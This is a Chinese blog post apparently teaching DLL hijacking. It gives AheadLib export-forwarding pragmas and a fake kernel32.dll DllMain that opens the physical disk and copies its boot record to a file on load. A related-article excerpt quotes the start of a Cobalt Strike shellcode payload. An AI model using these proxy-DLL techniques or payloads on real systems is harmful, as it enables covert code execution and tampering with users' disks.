DLL劫持技术

最新推荐文章于 2024-10-15 11:56:14 发布
最新推荐文章于 2024-10-15 11:56:14 发布
阅读量4.5k 收藏 6
点赞数 4
分类专栏: C/C++ 系统底层 文章标签: 函数 技术 kernel c语言 APIHOOK
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19459853/article/details/50538832
版权

DLL劫持技术不想再多说了,具体的可以百度。。。。

先简单的说一句。。。运行一个PE文件,WINDOWS会首先在当前目录下寻找要用的DLL,如果找不到就上其他地方找,一直到系统目录。。。

然后想干嘛就干嘛了。。。

首先得伪造,别告诉我随便找个PE文件然后改一下名字就是伪造了。。。。

怎么伪造呢?当然是伪造导入表。

这里以劫持kernel32.dll来做一个读取硬盘的例子,做什么都可以的。。。反正我是想不到了

咳咳 是的,伪造导入表是很麻烦的工作,还得写转发的代码。如果某DLL的导入表很多(比如kernel32.dll和user32.dll),那你还没写成就先累死了。。。。。

这里以kernel32.dll为例(导入表好多好多的)

某个kernel32.dll的部分导出函数如下:

#pragma comment(linker, "/EXPORT:ActivateActCtx=_AheadLib_ActivateActCtx,@5")
#pragma comment(linker, "/EXPORT:AddAtomA=_AheadLib_AddAtomA,@6")
#pragma comment(linker, "/EXPORT:AddAtomW=_AheadLib_AddAtomW,@7")
#pragma comment(linker, "/EXPORT:AddConsoleAliasA=_AheadLib_AddConsoleAliasA,@8")
#pragma comment(linker, "/EXPORT:AddConsoleAliasW=_AheadLib_AddConsoleAliasW,@9")
#pragma comment(linker, "/EXPORT:AddDllDirectory=_AheadLib_AddDllDirectory,@10")

还有不少的呢,总共1000多行。。。。
这里推荐一款很好用的自动生成工具:



使用很简单。用默认的就可以。。。

然后你可以在生成的代码中找到

AheadLib_原DLL导出函数名()

比如

ALCDECL AheadLib_MulDiv(void)
{
	GetAddress("MulDiv");
	__asm JMP EAX;
}

在这里,你可以添加一些自己的代码。。。

这里我们的目的是在被劫持的kernel32.dll启动就弹出一些对话框,然后读取硬盘的主引导记录


BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
	if (dwReason == DLL_PROCESS_ATTACH)
	{
		DisableThreadLibraryCalls(hModule);
		FILE *DiskFile;
		FILE *MBRCode;
		unsigned char Code[DISKSIZE]={0};
		DiskFile=fopen("\\\\.\\PhysicalDrive0","rb+");
		MsgBox("判断硬盘主引导记录是否能被读取,点击[确定]按钮继续");
		if(!DiskFile)
		{
			MsgBox("打开硬盘失败");
			goto Exit;
		}
		else if(!feof(DiskFile))
		{
			fseek(DiskFile,0,SEEK_SET);//移动到主引导记录的位置
			fread(Code,1,DISKSIZE,DiskFile);
			if(Code[510]==85 && Code[511]==170)
			{
				MsgBox("系统可以识别主引导记录");
				MsgBox("点击[确定]将MBR保存到当前目录")
			}
			else
			{
				MsgBox("系统不能识别主引导记录");
				MsgBox("点击[确定]将MBR保存到当前目录");
			}
			MBRCode=fopen("MBR.ini","wb+");
			if(!MBRCode)
			{
				MsgBox("备份主引导记录失败");
				goto Exit;
			}else if(!feof(MBRCode))
			{
				fwrite(Code,DISKSIZE,1,MBRCode);
				fclose(MBRCode);
				fclose(DiskFile);
				MsgBox("主引导记录备份成功,文件名是当前目录下的 MBR.ini");
			}
		}
Exit:
		return Load();
	}
	else if (dwReason == DLL_PROCESS_DETACH)
		Free();
	return TRUE;
}


我有一个加了VMP壳的CM,这个在启动时用到了kernel32.dll中的一个或者多个函数。双击它


一直点击到:

当点击到这里时,程序的窗口才会显示
好啦,把用到的工具一起传上来吧

下载地址:http://pan.baidu.com/s/1kTX1MB1

DLL劫持技术研究
不忘初心,护天下安全!
06-01 486
DLL(Dynamic Link Library)文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型。 在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件。Windows操作系统通过“DLL路径搜索目录顺序”和“Know DLLs注册表项”的机制来确定应用程序所要调用的DLL的路径,之后,应用程序就将DLL载入了自己的内存空间,执行相应的函数功能。DLL路径搜索目录顺序1.程序所在目录2.程序加载目录(SetCurrentDirectory
dll劫持
qq_46804551的博客
05-04 6290
aheadlib工具劫持 可以看见生成了一个cpp文件,然后我们创建一个dll文件 将生成的cpp文件替换到如下文件 添加#include “pch.h” 填加如下代码 /* cs的payload length: 892 bytes */ unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b
AheadLib DLL劫持工具介绍
gitblog_09795的博客
10-15 432
AheadLib DLL劫持工具介绍 【下载地址】AheadLibDLL劫持工具介绍 AheadLib 是一款强大的工具,专门用于生成CPP代码或VS2022工程,适用于DLL劫持场景。该工具支持X86和X64架构,是进行DLL劫持操作的必备工具 ...
白加黑(dll劫持
qq_59468567的博客
04-13 1044
DLL全称dynamic-link library,即动态链接库,是一个包含可以由多个程序同时使用的代码和数据的库。比如,windows操作系统中的Comdlg32.dll 包含常见的对话框相关导出函数,当我们在程序中加载该DLL后,就能使用该DLL中的函数来实现“打开”对话框。用大白话解释,每一个DLL都有一些特定的功能,包含该DLL即可使用这些功能。而DLL劫持其实就是在不破坏目标DLL的功能的情况下,增加一些恶意代码,使程序执行恶意代码。
DLL劫持示例程序:EXE+DLL
07-03
1. 这是本人编写的DLL劫持演示程序,整个解决方案中包含三个工程:EXE主调程序、DLL被调程序、DLL劫持程序。 2. 本解决方案是基于VS2005开发的。
一种通用DLL劫持技术研究
11-29
### 一种通用DLL劫持技术研究 #### 概述 DLL劫持是一种常见的技术手段,主要应用于软件开发、安全测试及恶意软件攻击等场景。其基本思路在于利用Windows操作系统的特性,通过替换或预加载特定的动态链接库(DLL)...
dll劫持技术
06-24
Dll劫持,其实攻击的方法说白了就是偷梁换柱。将一些恶意的DLL文件伪装成Windows的动态链接库,由于某些软件在调用Windows动态链接库的时候会先搜索本目录下的,因此就导致了伪装DLL文件的执行。
cpp-SuperDllHijack一种通用Dll劫持技术不再需要手工导出Dll函数接口了
08-16
《深入理解SuperDllHijack:通用Dll劫持技术的新篇章》 在C/C++编程领域,Dll劫持Dll Hijacking)是一种常见的软件安全漏洞利用手段,它通常涉及恶意代码替换或篡改目标程序加载的动态链接库(Dll),以此达到...
DLL 劫持技术(内存补丁技术
11-24
### DLL劫持技术详解 #### 一、概述 在逆向工程领域中,为了改变程序原有的执行流程,使之增加或减少某些功能代码,通常需要对原文件进行“打补丁”。这种“打补丁”的方式有两种:文件补丁和内存补丁。文件补丁是...
DLL劫持生成器.exe
05-21
一键生成DLL文件函数
DLL劫持生成软件
08-24
DLL劫持生成软件
DLL劫持-Hijack-原理及其实现细节
08-21
DLL劫持-Hijack-原理及其实现细节
DLL搜索的目录顺序(DLL劫持
WLINX
08-23 1394
DLL劫持技术当一个可执行文件运行时,Windows加载器将可执行模块映射到进程的地址空间中,加载器分析可执行模块的输入表,并设法找出任何需要的DLL,并将它们映射到进程的地址空间中。由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。(...
Dll劫持
SHELLCODE_8BIT的博客
12-01 704
dll劫持_. iDea.的博客-CSDN博客_dll劫持
DLL劫持实验
雩停
03-11 691
DLL劫持原理 如果A.exe想要调用D.dll,并且使用里面的FunC函数,这样的话,我们把B.dll改名为BB.dll(有的不用,直接根据路径劫持),然后我们自己写一个B.dll里面有一个FunC这个函数,然后我们在这个函数里加载BB.dll,并且调用里面的FunC函数,之后我们再干一些自己的事,对于A.exe来说通常没什么异常,这样我们的劫持目的就达到了。 实验过程 首先编写正常的DLL导出...
DLL 劫持原理(运维),2024年最新跟Linux运维初学者分享几点经验
2301_82101171的博客
04-13 795
那么最终Windows2003以上以及win7以上操作系统通过“DLL路径搜索目录顺序”和“KnownDLLs注册表项”的机制来确定应用程序所要调用的DLL的路径,之后,应用程序就将DLL载入了自己的内存空间,执行相应的函数功能。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
DLL劫持技术是如何通过内存补丁实现的?请结合OllyDBG和十六进制工具的应用进行详细说明。
最新发布
10-28
对于想要深入学习DLL劫持技术的读者,《DLL劫持技术:内存补丁实现与应用》一书提供了丰富的理论知识和实战技巧,是掌握这一高级技术的绝佳资源。 参考资源链接:[DLL劫持技术:内存补丁实现与应用]...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值